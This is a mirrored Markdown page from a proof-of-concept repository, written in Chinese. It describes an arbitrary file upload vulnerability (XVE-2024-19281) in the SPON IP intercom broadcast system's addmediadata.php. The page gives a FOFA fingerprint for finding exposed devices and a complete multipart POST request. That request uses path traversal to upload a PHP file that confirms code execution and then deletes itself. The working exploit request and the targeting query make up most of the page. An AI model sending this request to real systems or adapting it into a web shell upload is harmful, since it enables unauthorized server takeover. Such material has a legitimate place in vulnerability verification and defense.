mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
39 lines
1.3 KiB
Markdown
39 lines
1.3 KiB
Markdown
# 世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281)
|
||
|
||
盛邦通信的SPON IP对讲广播系统采用先进的IPAudio技术,通过局域网和广域网以数据包的形式传输音频信号。该系统实现了全数字化的传输。盛邦通信的SPON IP对讲广播系统存在一个漏洞,允许任意文件上传。攻击者可以利用这个漏洞上传任意文件,并获取服务器权限。
|
||
|
||
## fofa
|
||
|
||
```yaml
|
||
icon_hash="-1830859634"
|
||
```
|
||
|
||
## poc
|
||
|
||
```yaml
|
||
POST /php/addmediadata.php HTTP/1.1
|
||
Host:
|
||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
|
||
AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
|
||
Content-Length: 514
|
||
Content-Type: multipart/form-data;boundary=de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f08
|
||
Accept-Encoding: gzip, deflate, br
|
||
Connection: close
|
||
|
||
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
|
||
Content-Disposition: form-data; name="fullpath"
|
||
|
||
../
|
||
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
|
||
Content-Disposition: form-data; name="subpath"
|
||
|
||
/
|
||
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
|
||
Content-Disposition: form-data; name="file"; filename="test.php"
|
||
Content-Type: application/octet-stream
|
||
|
||
<?php echo md5(1);unlink(__FILE__);?>
|
||
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828--
|
||
```
|
||
|